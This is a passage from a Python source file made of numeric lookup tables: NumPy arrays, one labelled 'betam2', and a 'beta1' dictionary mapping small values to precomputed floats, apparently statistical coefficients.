0.0294,0.0296,0.0298,0.03,0.03025,0.0305,0.03075,0.031,0.0312,0.0314,0.0316,0.0318,0.032,0.03225,0.0325,0.03275,0.033,0.03325,0.0335,0.03375,0.034,0.0342,0.0344,0.034600000000000006,0.034800000000000005,0.035,0.035250000000000004,0.035500000000000004,0.03575,0.036,0.03625,0.0365,0.03675,0.037,0.0372,0.037399999999999996,0.0376,0.0378,0.038,0.03825,0.0385,0.03875,0.039,0.03925,0.0395,0.03975,0.04,0.04025,0.0405,0.04075,0.041,0.04125,0.0415,0.04175,0.042,0.0422,0.0424,0.0426,0.0428,0.043,0.04325,0.0435,0.04375,0.044,0.04425,0.0445,0.04475,0.045,0.04525,0.0455,0.04575,0.046,0.04625,0.0465,0.04675,0.047,0.04725,0.0475,0.04775,0.048,0.0482,0.0484,0.048600000000000004,0.0488,0.049,0.04925,0.0495,0.04975,0.05,0.05025,0.0505,0.050749999999999997,0.051,0.05125,0.0515,0.05175,0.052,0.05225,0.0525,0.05275,0.053,0.05325,0.0535,0.05375,0.054,0.05425,0.0545,0.05475,0.055,0.05525,0.0555,0.05575,0.056,0.05625,0.0565,0.05675,0.057,0.05725,0.0575,0.05775,0.058,0.05825,0.058499999999999996,0.05875,0.059,0.05933333333333333,0.059666666666666666,0.06,0.06025,0.0605,0.06075,0.061,0.06125,0.0615,0.06175,0.062,0.06225,0.0625,0.06275,0.063,0.06325,0.0635,0.06375,0.064,0.06425,0.0645,0.06475,0.065,0.06525,0.0655,0.06575,0.066,0.06633333333333334,0.06666666666666667,0.067,0.06725,0.0675,0.06775,0.068,0.06825,0.0685,0.06875,0.069,0.06925,0.0695,0.06975,0.07,0.07033333333333333,0.07066666666666667,0.071,0.07125,0.0715,0.07175,0.072,0.07225,0.0725,0.07275,0.073,0.07325,0.0735,0.07375,0.074,0.07433333333333333,0.07466666666666666,0.075,0.07525,0.0755,0.07575,0.076,0.07633333333333334,0.07666666666666666,0.077,0.07725,0.0775,0.07775,0.078,0.07825,0.0785,0.07875,0.079,0.07933333333333334,0.07966666666666666,0.08,0.08025,0.0805,0.08075,0.081,0.08133333333333334,0.08166666666666667,0.082,0.08225,0.0825,0.08275,0.083,0.08333333333333334,0.08366666666666667,0.084,0.08425,0.0845,0.08475,0.085,0.08533333333333333,0.08566666666666667,0.086,0.08625,0.0865,0.08675,0.087,0.08733333333333333,0.08766666666666666,0.088,0.08825,0.0885,0.08875,0.089,0.08933333333333333,0.08966666666666666,0.09,0.09025,0.0905,0.09075,0.091,0.09133333333333334,0.09166666666666666,0.092,0.09225,0.0925,0.09275,0.093,0.09333333333333334,0.09366666666666666,0.094,0.09433333333333334,0.09466666666666666,0.095,0.09525,0.0955,0.09575,0.096,0.09633333333333334,0.09666666666666666,0.097,0.09733333333333334,0.09766666666666667,0.098,0.09825,0.0985,0.09875,0.099,0.09933333333333334,0.09966666666666667,0.1,0.10033333333333334,0.10066666666666667,0.101,0.10133333333333333,0.10166666666666667,0.102,0.10225,0.1025,0.10275,0.103,0.10333333333333333,0.10366666666666666,0.104,0.10433333333333333,0.10466666666666666,0.105,0.10533333333333333,0.10566666666666666,0.106,0.10633333333333334,0.10666666666666666,0.107,0.10725,0.1075,0.10775,0.108,0.10833333333333334,0.10866666666666666,0.109,0.10933333333333334,0.10966666666666666,0.11,0.11033333333333334,0.11066666666666666,0.111,0.11133333333333334,0.11166666666666666,0.112,0.11233333333333334,0.11266666666666666,0.113,0.11333333333333334,0.11366666666666667,0.114,0.11433333333333334,0.11466666666666667,0.115,0.11533333333333334,0.11566666666666667,0.116,0.11625,0.1165,0.11675,0.117,0.11733333333333333,0.11766666666666667,0.118,0.11833333333333333,0.11866666666666666,0.119,0.11933333333333333,0.11966666666666666,0.12,0.12033333333333333,0.12066666666666666,0.121,0.12133333333333333,0.12166666666666666,0.122,0.12233333333333334,0.12266666666666666,0.123,0.1235,0.124,0.12433333333333334,0.12466666666666666,0.125,0.12533333333333332,0.12566666666666668,0.126,0.12633333333333333,0.12666666666666668,0.127,0.12733333333333333,0.12766666666666668,0.128,0.12833333333333333,0.12866666666666668,0.129,0.12933333333333333,0.12966666666666668,0.13,0.13033333333333333,0.13066666666666668,0.131,0.13133333333333333,0.13166666666666668,0.132,0.1325,0.133,0.13333333333333333,0.13366666666666668,0.134,0.13433333333333333,0.13466666666666668,0.135,0.13533333333333333,0.13566666666666669,0.136,0.13633333333333333,0.1366666666666667,0.137,0.1375,0.138,0.13833333333333334,0.1386666666666667,0.139,0.13933333333333334,0.1396666666666667,0.14,0.14033333333333334,0.14066666666666666,0.141,0.1415,0.142,0.1423333333333333,0.14266666666666666,0.143,0.1433333333333333,0.14366666666666666,0.144,0.1445,0.145,0.14533333333333331,0.14566666666666667,0.146,0.14633333333333332,0.14666666666666667,0.147,0.1475,0.148,0.14833333333333332,0.14866666666666667,0.149,0.14933333333333332,0.14966666666666667,0.15,0.1505,0.151,0.15133333333333332,0.15166666666666667,0.152,0.1525,0.153,0.15333333333333332,0.15366666666666667,0.154,0.1545,0.155,0.15533333333333332,0.15566666666666668,0.156,0.15633333333333332,0.15666666666666668,0.157,0.1575,0.158,0.15833333333333333,0.15866666666666668,0.159,0.1595,0.16,0.16033333333333333,0.16066666666666668,0.161,0.1615,0.162,0.16233333333333333,0.16266666666666668,0.163,0.1635,0.164,0.1645,0.165,0.16533333333333333,0.16566666666666668,0.166,0.1665,0.167,0.16733333333333333,0.16766666666666669,0.168,0.1685,0.169,0.1695,0.17,0.17033333333333334,0.1706666666666667,0.171,0.17149999999999999,0.172,0.1725,0.173,0.1733333333333333,0.17366666666666666,0.174,0.1745,0.175,0.1755,0.176,0.17633333333333331,0.17666666666666667,0.177,0.1775,0.178,0.1785,0.179,0.17933333333333332,0.17966666666666667,0.18,0.1805,0.181,0.1815,0.182,0.1825,0.183,0.18333333333333332,0.18366666666666667,0.184,0.1845,0.185,0.1855,0.186,0.1865,0.187,0.1875,0.188,0.1885,0.189,0.18933333333333333,0.18966666666666668,0.19,0.1905,0.191,0.1915,0.192,0.1925,0.193,0.1935,0.194,0.1945,0.195,0.1955,0.196,0.1965,0.197,0.1975,0.198,0.19833333333333333,0.19866666666666669,0.199,0.1995,0.2,0.2005,0.201,0.2015,0.202,0.2025,0.203,0.20350000000000001,0.204,0.2045,0.205,0.2055,0.206,0.2065,0.207,0.2075,0.208,0.2085,0.209,0.2095,0.21,0.2105,0.211,0.212,0.2125,0.213,0.2135,0.214,0.2145,0.215,0.2155,0.216,0.2165,0.217,0.2175,0.218,0.2185,0.219,0.2195,0.22,0.221,0.2215,0.222,0.2225,0.223,0.2235,0.224,0.2245,0.225,0.2255,0.226,0.227,0.2275,0.228,0.2285,0.229,0.2295,0.23,0.231,0.2315,0.232,0.2325,0.233,0.2335,0.234,0.235,0.2355,0.236,0.2365,0.237,0.238,0.2385,0.239,0.2395,0.24,0.241,0.2415,0.242,0.2425,0.243,0.244,0.2445,0.245,0.2455,0.246,0.247,0.2475,0.248,0.249,0.2495,0.25,0.2505,0.251,0.252,0.2525,0.253,0.254,0.2545,0.255,0.256,0.2565,0.257,0.258,0.2585,0.259,0.26,0.2605,0.261,0.262,0.2625,0.263,0.264,0.2645,0.265,0.266,0.2665,0.267,0.268,0.2685,0.269,0.27,0.271,0.2715,0.272,0.273,0.2735,0.274,0.275,0.276,0.2765,0.277,0.278,0.279,0.2795,0.28,0.281,0.282,0.2825,0.283,0.284,0.285,0.2855,0.286,0.287,0.288,0.2885,0.289,0.29,0.291,0.292,0.2925,0.293,0.294,0.295,0.296,0.2965,0.297,0.298,0.299,0.3,0.301,0.3015,0.302,0.303,0.304,0.305,0.306,0.307,0.3075,0.308,0.309,0.31,0.311,0.312,0.313,0.314,0.3145,0.315,0.316,0.317,0.318,0.319,0.32,0.321,0.322,0.323,0.324,0.325,0.326,0.327,0.328,0.329,0.33,0.331,0.332,0.333,0.334,0.335,0.336,0.337,0.338,0.339,0.34,0.341,0.342,0.343,0.344,0.345,0.346,0.347,0.349,0.35,0.351,0.352,0.353,0.354,0.355,0.357,0.358,0.359,0.36,0.361,0.363,0.364,0.365,0.366,0.367,0.369,0.37,0.371,0.373,0.374,0.375,0.376,0.378,0.379,0.381,0.382,0.383,0.385,0.386,0.387,0.389,0.39,0.392,0.393,0.395,0.396,0.398,0.399,0.401,0.402,0.404,0.406,0.407,0.409,0.411,0.412,0.414,0.416,0.417,0.419,0.421,0.423,0.424,0.426,0.428,0.43,0.432,0.434,0.436,0.438,0.44,0.442,0.444,0.446,0.448,0.45,0.453,0.455,0.457,0.46,0.462,0.464,0.467,0.469,0.472,0.474,0.477,0.48,0.483,0.485,0.488,0.491,0.494,0.497,0.501,0.504,0.507,0.511,0.514,0.518,0.522,0.525,0.529,0.534,0.538,0.542,0.547,0.552,0.557,0.562,0.568,0.574,0.58,0.587,0.594,0.602,0.61,0.619,0.629,0.64,0.653,0.668,0.687,0.711,0.749,0.999]), 'betam2': np.array([0.251,0.288,0.313,0.331,0.346,0.359,0.371,0.381,0.39,0.398,0.406,0.413,0.419,0.426,0.432,0.437,0.442,0.448,0.452,0.457,0.462,0.466,0.47,0.474,0.478,0.482,0.485,0.489,0.492,0.496,0.499,0.502,0.505,0.508,0.511,0.514,0.517,0.52,0.522,0.525,0.528,0.53,0.533,0.535,0.538,0.54,0.542,0.545,0.547,0.549,0.551,0.553,0.555,0.558,0.56,0.562,0.564,0.566,0.567,0.569,0.571,0.573,0.575,0.577,0.579,0.58,0.582,0.584,0.586,0.587,0.589,0.591,0.592,0.594,0.595,0.597,0.599,0.6,0.602,0.603,0.605,0.606,0.608,0.609,0.61,0.612,0.613,0.615,0.616,0.617,0.619,0.62,0.622,0.623,0.624,0.626,0.627,0.628,0.629,0.631,0.632,0.633,0.634,0.636,0.637,0.638,0.639,0.64,0.642,0.643,0.644,0.645,0.646,0.647,0.649,0.65,0.651,0.652,0.653,0.654,0.655,0.656,0.657,0.658,0.659,0.66,0.662,0.663,0.664,0.665,0.666,0.667,0.668,0.669,0.67,0.671,0.672,0.673,0.674,0.675,0.676,0.6765000000000001,0.677,0.678,0.679,0.68,0.681,0.682,0.683,0.684,0.685,0.686,0.687,0.688,0.6884999999999999,0.689,0.69,0.691,0.692,0.693,0.694,0.695,0.6955,0.696,0.697,0.698,0.699,0.7,0.7004999999999999,0.701,0.702,0.703,0.704,0.705,0.7055,0.706,0.707,0.708,0.709,0.7095,0.71,0.711,0.712,0.7124999999999999,0.713,0.714,0.715,0.716,0.7164999999999999,0.717,0.718,0.719,0.7195,0.72,0.721,0.7215,0.722,0.723,0.724,0.7244999999999999,0.725,0.726,0.727,0.7275,0.728,0.729,0.7295,0.73,0.731,0.732,0.7324999999999999,0.733,0.734,0.7344999999999999,0.735,0.736,0.7364999999999999,0.737,0.738,0.7384999999999999,0.739,0.74,0.7404999999999999,0.741,0.742,0.7424999999999999,0.743,0.744,0.7444999999999999,0.745,0.746,0.7464999999999999,0.747,0.748,0.7484999999999999,0.749,0.7495,0.75,0.751,0.7515000000000001,0.752,0.753,0.7535000000000001,0.754,0.7545,0.755,0.756,0.7565,0.757,0.7575000000000001,0.758,0.759,0.7595000000000001,0.76,0.7605,0.761,0.762,0.7625,0.763,0.7635000000000001,0.764,0.765,0.7655000000000001,0.766,0.7665,0.767,0.768,0.7685,0.769,0.7695000000000001,0.77,0.7705,0.771,0.7715000000000001,0.772,0.773,0.7735000000000001,0.774,0.7745,0.775,0.7755000000000001,0.776,0.7765,0.777,0.778,0.7785,0.779,0.7795000000000001,0.78,0.7805,0.781,0.7815000000000001,0.782,0.7825,0.783,0.784,0.7845,0.785,0.7855000000000001,0.786,0.7865,0.787,0.7875000000000001,0.788,0.7885,0.789,0.7895000000000001,0.79,0.7905,0.791,0.7915000000000001,0.792,0.7925,0.793,0.7935000000000001,0.794,0.7945,0.795,0.7955000000000001,0.796,0.7965,0.797,0.7975000000000001,0.798,0.7985,0.799,0.7995000000000001,0.8,0.8005,0.801,0.8015000000000001,0.802,0.8025,0.803,0.8035000000000001,0.804,0.8045,0.805,0.8055000000000001,0.806,0.8063333333333333,0.8066666666666668,0.807,0.8075000000000001,0.808,0.8085,0.809,0.8095000000000001,0.81,0.8105,0.811,0.8115000000000001,0.812,0.8125,0.813,0.8133333333333332,0.8136666666666666,0.814,0.8145,0.815,0.8154999999999999,0.816,0.8165,0.817,0.8173333333333332,0.8176666666666667,0.818,0.8185,0.819,0.8194999999999999,0.82,0.8205,0.821,0.8213333333333332,0.8216666666666667,0.822,0.8225,0.823,0.8234999999999999,0.824,0.8245,0.825,0.8253333333333333,0.8256666666666667,0.826,0.8265,0.827,0.8274999999999999,0.828,0.8283333333333333,0.8286666666666667,0.829,0.8294999999999999,0.83,0.8303333333333333,0.8306666666666667,0.831,0.8314999999999999,0.832,0.8325,0.833,0.8333333333333333,0.8336666666666667,0.834,0.8345,0.835,0.8353333333333333,0.8356666666666667,0.836,0.8365,0.837,0.8373333333333333,0.8376666666666667,0.838,0.8385,0.839,0.8393333333333333,0.8396666666666667,0.84,0.8405,0.841,0.8413333333333333,0.8416666666666667,0.842,0.8425,0.843,0.8433333333333333,0.8436666666666667,0.844,0.8445,0.845,0.8453333333333333,0.8456666666666667,0.846,0.8465,0.847,0.8473333333333333,0.8476666666666667,0.848,0.8485,0.849,0.8493333333333333,0.8496666666666667,0.85,0.8503333333333333,0.8506666666666667,0.851,0.8514999999999999,0.852,0.8523333333333333,0.8526666666666667,0.853,0.8533333333333333,0.8536666666666667,0.854,0.8545,0.855,0.8553333333333333,0.8556666666666667,0.856,0.8563333333333333,0.8566666666666667,0.857,0.8574999999999999,0.858,0.8583333333333333,0.8586666666666667,0.859,0.8593333333333333,0.8596666666666667,0.86,0.8605,0.861,0.8613333333333333,0.8616666666666667,0.862,0.8623333333333333,0.8626666666666667,0.863,0.8633333333333333,0.8636666666666667,0.864,0.8643333333333333,0.8646666666666667,0.865,0.8654999999999999,0.866,0.8663333333333333,0.8666666666666667,0.867,0.8673333333333333,0.8676666666666667,0.868,0.8683333333333333,0.8686666666666667,0.869,0.8693333333333333,0.8696666666666667,0.87,0.8703333333333333,0.8706666666666667,0.871,0.8714999999999999,0.872,0.8723333333333333,0.8726666666666667,0.873,0.8733333333333333,0.8736666666666667,0.874,0.8743333333333333,0.8746666666666667,0.875,0.8753333333333333,0.8756666666666667,0.876,0.8763333333333333,0.8766666666666667,0.877,0.8773333333333333,0.8776666666666667,0.878,0.8783333333333333,0.8786666666666667,0.879,0.8793333333333333,0.8796666666666667,0.88,0.8803333333333333,0.8806666666666667,0.881,0.8813333333333333,0.8816666666666667,0.882,0.8823333333333333,0.8826666666666667,0.883,0.8833333333333333,0.8836666666666667,0.884,0.8843333333333333,0.8846666666666667,0.885,0.8853333333333333,0.8856666666666667,0.886,0.8863333333333333,0.8866666666666667,0.887,0.8873333333333333,0.8876666666666667,0.888,0.88825,0.8885000000000001,0.88875,0.889,0.8893333333333333,0.8896666666666667,0.89,0.8903333333333333,0.8906666666666667,0.891,0.8913333333333333,0.8916666666666667,0.892,0.8923333333333333,0.8926666666666667,0.893,0.8933333333333333,0.8936666666666667,0.894,0.89425,0.8945000000000001,0.89475,0.895,0.8953333333333333,0.8956666666666667,0.896,0.8963333333333333,0.8966666666666667,0.897,0.8973333333333333,0.8976666666666667,0.898,0.89825,0.8985000000000001,0.89875,0.899,0.8993333333333333,0.8996666666666667,0.9,0.9003333333333333,0.9006666666666667,0.901,0.9013333333333333,0.9016666666666667,0.902,0.90225,0.9025000000000001,0.90275,0.903,0.9033333333333333,0.9036666666666667,0.904,0.9043333333333333,0.9046666666666667,0.905,0.90525,0.9055,0.90575,0.906,0.9063333333333333,0.9066666666666667,0.907,0.90725,0.9075,0.9077500000000001,0.908,0.9083333333333333,0.9086666666666667,0.909,0.9093333333333333,0.9096666666666667,0.91,0.91025,0.9105000000000001,0.9107500000000001,0.911,0.9113333333333333,0.9116666666666667,0.912,0.91225,0.9125000000000001,0.9127500000000001,0.913,0.9133333333333333,0.9136666666666667,0.914,0.91425,0.9145000000000001,0.9147500000000001,0.915,0.9153333333333333,0.9156666666666667,0.916,0.91625,0.9165000000000001,0.9167500000000001,0.917,0.9173333333333333,0.9176666666666667,0.918,0.91825,0.9185000000000001,0.9187500000000001,0.919,0.9193333333333333,0.9196666666666667,0.92,0.92025,0.9205000000000001,0.9207500000000001,0.921,0.92125,0.9215,0.9217500000000001,0.922,0.9223333333333333,0.9226666666666667,0.923,0.92325,0.9235,0.9237500000000001,0.924,0.92425,0.9245000000000001,0.9247500000000001,0.925,0.9253333333333333,0.9256666666666667,0.926,0.92625,0.9265000000000001,0.9267500000000001,0.927,0.92725,0.9275,0.9277500000000001,0.928,0.9283333333333333,0.9286666666666668,0.929,0.92925,0.9295,0.9297500000000001,0.93,0.93025,0.9305000000000001,0.9307500000000001,0.931,0.93125,0.9315,0.9317500000000001,0.932,0.9323333333333333,0.9326666666666668,0.933,0.93325,0.9335,0.9337500000000001,0.934,0.93425,0.9345000000000001,0.9347500000000001,0.935,0.93525,0.9355,0.9357500000000001,0.936,0.93625,0.9365000000000001,0.9367500000000001,0.937,0.93725,0.9375,0.93775,0.938,0.9383333333333332,0.9386666666666666,0.939,0.9392499999999999,0.9395,0.93975,0.94,0.9402499999999999,0.9404999999999999,0.94075,0.941,0.9412499999999999,0.9415,0.94175,0.942,0.9422499999999999,0.9424999999999999,0.94275,0.943,0.9432499999999999,0.9435,0.94375,0.944,0.9442499999999999,0.9444999999999999,0.94475,0.945,0.9452499999999999,0.9455,0.94575,0.946,0.9462499999999999,0.9464999999999999,0.94675,0.947,0.9472499999999999,0.9475,0.94775,0.948,0.9482499999999999,0.9484999999999999,0.94875,0.949,0.9492499999999999,0.9495,0.94975,0.95,0.9502499999999999,0.9504999999999999,0.95075,0.951,0.9512499999999999,0.9515,0.95175,0.952,0.9522499999999999,0.9524999999999999,0.95275,0.953,0.9531999999999999,0.9533999999999999,0.9536,0.9538,0.954,0.9542499999999999,0.9544999999999999,0.95475,0.955,0.9552499999999999,0.9555,0.95575,0.956,0.9562499999999999,0.9564999999999999,0.95675,0.957,0.9572499999999999,0.9575,0.95775,0.958,0.9581999999999999,0.9583999999999999,0.9586,0.9588,0.959,0.9592499999999999,0.9595,0.95975,0.96,0.9602499999999999,0.9604999999999999,0.96075,0.961,0.9612499999999999,0.9615,0.96175,0.962,0.9621999999999999,0.9623999999999999,0.9626,0.9628,0.963,0.9632499999999999,0.9635,0.96375,0.964,0.9642499999999999,0.9644999999999999,0.96475,0.965,0.9652,0.9653999999999999,0.9656,0.9658,0.966,0.9662499999999999,0.9664999999999999,0.96675,0.967,0.9672499999999999,0.9675,0.96775,0.968,0.9682,0.9683999999999999,0.9686,0.9688,0.969,0.96925,0.9695,0.96975,0.97,0.9702,0.9703999999999999,0.9706,0.9708,0.971,0.97125,0.9715,0.97175,0.972,0.9722,0.9723999999999999,0.9726,0.9728,0.973,0.97325,0.9735,0.97375,0.974,0.9742,0.9743999999999999,0.9746,0.9748,0.975,0.97525,0.9755,0.97575,0.976,0.9762,0.9763999999999999,0.9766,0.9768,0.977,0.97725,0.9775,0.97775,0.978,0.9782,0.9783999999999999,0.9786,0.9788,0.979,0.97925,0.9795,0.97975,0.98,0.9802,0.9803999999999999,0.9806,0.9808,0.981,0.9812,0.9813999999999999,0.9816,0.9818,0.982,0.98225,0.9824999999999999,0.98275,0.983,0.9832,0.9833999999999999,0.9836,0.9838,0.984,0.9842,0.9843999999999999,0.9846,0.9848,0.985,0.98525,0.9855,0.98575,0.986,0.9862,0.9863999999999999,0.9866,0.9868,0.987,0.9872,0.9873999999999999,0.9876,0.9878,0.988,0.9882,0.9884,0.9886,0.9888,0.989,0.98925,0.9895,0.98975,0.99,0.9902,0.9904,0.9906,0.9908,0.991,0.9912,0.9914,0.9916,0.9918,0.992,0.9922,0.9924,0.9926,0.9928,0.993,0.9932,0.9934,0.9936,0.9938,0.994,0.9942,0.9944,0.9946,0.9948,0.995,0.9952,0.9954,0.9956,0.9958,0.996,0.9962,0.9964,0.9966,0.9968,0.997,0.9972,0.9974,0.9976,0.9978,0.998,0.9982,0.9984,0.9986,0.9988,0.999,0.999,0.999,0.999,0.999]), 'beta1': {0.001: 0.00000319442756483, 0.002: 0.000011317463697, 0.003: 0.00002437224702, 0.004: 0.0000423586850569, 0.005: 0.0000652765986715, 0.006: 0.000093125769818, 0.007: 0.00012590591620148937, 0.008: 0.000163616721998012, 0.009: 0.0002062578100772347, 0.01: 0.0002538287583069279, 0.011: 0.000306329099853549, 0.012: 0.0003637583165964183, 0.013: 0.00042611584087932117, 0.014: 0.0004934010586615567, 0.015: 0.0005656133072855606, 0.016: 0.0006427518732867943, 0.017: 0.0007248159948162249, 0.018: 0.0008118048635664835, 0.019: 0.000903717621891434, 0.02: 0.001000553362565144, 0.021: 0.0011023111298422304, 0.022: 0.0012089899209829437, 0.023: 0.0013205886834092976, 0.024: 0.0014371063162054868, 0.025: 0.0015585416705288157, 0.026: 0.0016848935476064277, 0.027: 0.0018161607022541798, 0.028: 0.0019523418388866748, 0.029: 0.0020934356144756165, 0.03: 0.0022394406373552373, 0.031: 0.0023903554673226357, 0.032: 0.002546178615709405, 0.033: 0.0027069085455906938, 0.034: 0.002872543671793369, 0.035: 0.003043082360056609, 0.036: 0.0032185229285702534, 0.037: 0.0033988636467273906, 0.038: 0.003584102735485491, 0.039: 0.0037742383681569234, 0.04: 0.0039692686688357764, 0.041: 0.004169191713873449, 0.042: 0.004374005531412682, 0.043: 0.004583708101164634, 0.044: 0.004798297354602275, 0.045: 0.0050177711752145615, 0.046: 0.005242127397945962, 0.047: 0.005471363809906498, 0.048: 0.005705478149896408, 0.049: 0.005944468108748165, 0.05: 0.006188331329046212, 0.051: 0.006437065405400269, 0.052: 0.006690667884335984, 0.053: 0.006949136264386165, 0.054: 0.007212467996054513, 0.055: 0.0074806604819125325, 0.056: 0.007753711076500667, 0.057: 0.008031617086616195, 0.058: 0.008314375770990291, 0.059: 0.008601984340523077, 0.06: 0.00889443995837608, 0.061: 0.009191739739750827, 0.062: 0.009493880752152703, 0.063: 0.009800860015391079, 0.064: 0.010112674501407464, 0.065: 0.010429321134569111, 0.066: 0.010750796791506579, 0.067: 0.011077098301304688, 0.068: 0.011408222445400728, 0.069: 0.011744165957592563, 0.07: 0.012084925524209297, 0.071: 0.012430497784060565, 0.072: 0.012780879328580696, 0.073: 0.01313606670159937, 0.074: 0.01349605639963192, 0.075: 0.013860844871816616, 0.076: 0.014230428519951752, 0.077: 0.014604803698527647, 0.078: 0.014983966714864808, 0.079: 0.015367913828869609, 0.08: 0.015756641253450998, 0.081: 0.016150145154226952, 0.082: 0.0165484216497625, 0.083: 0.01695146681157209, 0.084: 0.01735927666406806, 0.085: 0.017771847184727605, 0.086: 0.018189174304006774, 0.087: 0.0186112539055101, 0.088: 0.019038081825895253, 0.089: 0.0194696538550656, 0.09: 0.01990596573604259, 0.091: 0.02034701316514059, 0.092: 0.020792791791978432, 0.093: 0.0212432972194774, 0.094: 0.021698525003969734, 0.095: 0.022158470655141968, 0.096: 0.02262312963619951, 0.097: 0.023092497363824387, 0.098: 0.02356656920832857, 0.099: 0.024045340493509006, 0.1: 0.024528806496860827, 0.101: 0.02501696244963071, 0.102: 0.025509803536677367, 0.103: 0.02600732489678805, 0.104: 0.02650952162246471, 0.105: 0.027016388760153814, 0.106: 0.02752792131023947, 0.107: 0.028044114227047643, 0.108: 0.028564962418981356, 0.109: 0.02909046074847784, 0.11: 0.02962060403212325, 0.111: 0.030155387040732673, 0.112: 0.030694804499282566, 0.113: 0.031238851087102927, 0.114: 0.03178752143778703, 0.115: 0.03234081013938614, 0.116: 0.03289871173438084, 0.117: 0.03346122071974054, 0.118: 0.034028331546989775, 0.119: 0.034600038622262325, 0.12: 0.03517633630635684, 0.121: 0.03575721891478989, 0.122: 0.03634268071786485, 0.123: 0.03693271594069995, 0.124: 0.037527318763313854, 0.125: 0.038126483320662014, 0.126: 0.03873020370270661, 0.127: 0.03933847395449336, 0.128: 0.039951288076140665, 0.129: 0.04056864002300359, 0.13: 0.041190523705625356, 0.131: 0.041816932989891205, 0.132: 0.04244786169702028, 0.133: 0.04308330360365301, 0.134: 0.04372325244195518, 0.135: 0.0443677018995566, 0.136: 0.04501664561978973, 0.137: 0.04567007720156599, 0.138: 0.04632799019958714, 0.139: 0.046990378124343715, 0.14: 0.04765723444216695, 0.141: 0.0483285525753247, 0.142: 0.049004325902069476, 0.143: 0.049684547756723464, 0.144: 0.05036921142970255, 0.145: 0.051058310167641355, 0.146: 0.05175183717341257, 0.147: 0.052449785606189916, 0.148: 0.05315214858157764, 0.149: 0.05385891917159001, 0.15: 0.054570090404798384, 0.151: 0.05528565526636637, 0.152: 0.05600560669808361, 0.153: 0.056729937598526965, 0.154: 0.05745864082302535, 0.155: 0.05819170918379992, 0.156: 0.05892913545003413, 0.157: 0.05967091234788417, 0.158: 0.060417032560635756, 0.159: 0.06116748872869495, 0.16: 0.06192227344973335, 0.161: 0.06268137927869694, 0.162: 0.06344479872792343, 0.163: 0.06421252426721585, 0.164: 0.06498454832387214, 0.165: 0.06576086328280793, 0.166: 0.06654146148661619, 0.167: 0.06732633523563517, 0.168: 0.06811547678803058, 0.169: 0.0689088783598769, 0.17: 0.06970653212522365, 0.171: 0.07050843021617553, 0.172: 0.07131456472297787, 0.173: 0.07212492769408313, 0.174: 0.07293951113623787, 0.175: 0.07375830701456244, 0.176: 0.07458130725262246, 0.177: 0.07540850373251008, 0.178: 0.0762398882949351, 0.179: 0.07707545273928854, 0.18: 0.07791518882372675, 0.181: 0.07875908826527792, 0.182: 0.07960714273989093, 0.183: 0.08045934388252407, 0.184: 0.08131568328724223, 0.185: 0.08217615250729793, 0.186: 0.0830407430551911, 0.187: 0.08390944640278333, 0.188: 0.0847822539813623, 0.189: 0.08565915718173367, 0.19: 0.08654014735430549, 0.191: 0.08742521580917012, 0.192: 0.08831435381620054, 0.193: 0.08920755260511812, 0.194: 0.09010480336558876, 0.195: 0.0910060972473264, 0.196: 0.09191142536015391, 0.197: 0.09282077877409256, 0.198: 0.09373414851947465, 0.199: 0.09465152558700353, 0.2: 0.09557290092786028, 0.201: 0.09649826545380326, 0.202: 0.09742761003720588, 0.203: 0.09836092551122107, 0.204: 0.09929820266980503, 0.205: 0.10023943226786301, 0.206: 0.10118460502128393, 0.207: 0.10213371160709263, 0.208: 0.10308674266349475, 0.209: 0.10404368878997927, 0.21: 0.10500454054743683, 0.211: 0.10596928845821446, 0.212: 0.10693792300624841, 0.213: 0.10791043463711919, 0.214: 0.10888681375817334, 0.215: 0.10986705073861491, 0.216: 0.11085113590957893, 0.217: 0.11183905956425746, 0.218: 0.11283081195797032, 0.219: 0.11382638330828407, 0.22: 0.11482576379508422, 0.221: 0.11582894356068629, 0.222: 0.11683591270992946, 0.223: 0.11784666131028751, 0.224: 0.1188611793919315, 0.225: 0.11987945694787307, 0.226: 0.12090148393402742, 0.227: 0.12192725026933787, 0.228: 0.12295674583585153, 0.229: 0.12398996047883411, 0.23: 0.125026884006872, 0.231: 0.12606750619196658, 0.232: 0.12711181676963323, 0.233: 0.12815980543900615, 0.234: 0.12921146186294907, 0.235: 0.1302667756681294, 0.236: 0.13132573644515383, 0.237: 0.13238833374864933, 0.238: 0.13345455709737608, 0.239: 0.13452439597432544, 0.24: 0.1355978398268364, 0.241: 0.13667487806666417, 0.242: 0.13775550007013634, 0.243: 0.1388396951782204, 0.244: 0.13992745269663925, 0.245: 0.1410187618959683, 0.246: 0.14211361201176276, 0.247: 0.14321199224465206, 0.248: 0.14431389176043544, 0.249: 0.14541929969020284, 0.25: 0.1465282051304419, 0.251: 0.14764059714313438, 0.252: 0.14875646475587598, 0.253: 0.14987579696197337, 0.254: 0.15099858272057623, 0.255: 0.15212481095674632, 0.256: 0.15325447056160868, 0.257: 0.1543875503924239, 0.258: 0.1555240392727349, 0.259: 0.1566639259924429, 0.26: 0.15780719930794154, 0.261: 0.15895384794222778, 0.262: 0.1601038605849814, 0.263: 0.1612572258927219, 0.264: 0.162413932488892, 0.265: 0.16357396896397502, 0.266: 0.16473732387561, 0.267: 0.16590398574870388, 0.268: 0.16707394307554502, 0.269: 0.168247184315915, 0.27: 0.16942369789720155, 0.271: 0.17060347221452565, 0.272: 0.17178649563082535, 0.273: 0.1729727564770086, 0.274: 0.17416224305204242, 0.275: 0.17535494362307535, 0.276: 0.1765508464255532, 0.277: 0.1777499396633379, 0.278: 0.17895221150881968, 0.279: 0.18015765010303586, 0.28: 0.1813662435557958, 0.281: 0.18257797994577735, 0.282: 0.18379284732066176, 0.283: 0.1850108336972498, 0.284: 0.18623192706156758, 0.285: 0.18745611536901166, 0.286: 0.18868338654443928, 0.287: 0.18991372848229773, 0.288: 0.19114712904674702, 0.289: 0.19238357607177733, 0.29: 0.1936230573613347, 0.291: 0.1948655606894299, 0.292: 0.19611107380026316, 0.293: 0.19735958440834733, 0.294: 0.198611080198637, 0.295: 0.19986554882663596, 0.296: 0.20112297791851938, 0.297: 0.20238335507126698, 0.298: 0.2036466678527809, 0.299: 0.2049129038020017, 0.3: 0.20618205042904286, 0.301: 0.20745409521529598, 0.302: 0.2087290256135832, 0.303: 0.2100068290482507, 0.304: 0.21128749291530408, 0.305: 0.21257100458254238, 0.306: 0.2138573513896706, 0.307: 0.21514652064842565, 0.308: 0.21643849964271128, 0.309: 0.21773327562871456, 0.31: 0.21903083583502458, 0.311: 0.220331167462782, 0.312: 0.22163425768578188, 0.313: 0.22294009365060716, 0.314: 0.22424866247676634, 0.315: 0.22555995125679856, 0.316: 0.22687394705642888, 0.317: 0.22819063691467345, 0.318: 